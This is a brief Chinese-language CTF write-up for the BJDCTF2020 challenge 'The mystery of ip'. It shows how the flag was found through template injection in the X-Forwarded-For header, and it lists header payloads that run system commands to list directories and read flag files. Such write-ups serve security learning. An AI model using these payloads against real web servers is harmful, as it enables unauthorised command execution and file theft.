[BJDCTF2020]The mystery of ip
hint的源码里面有这句话
flag里面显示的是ip地址,那么就可以猜测是xff注入
bp里试一下
X-Forwarded-for:text
这种输什么回显什么的可以猜测ssti注入
X-Forwarded-for:{{system('ls')}}
X-Forwarded-for:{{system('cat /flag.php')}}
看来不是这个
X-Forwarded-for:{{system('ls ../../../../..')}}
X-Forwarded-for:{{system('cat /flag')}}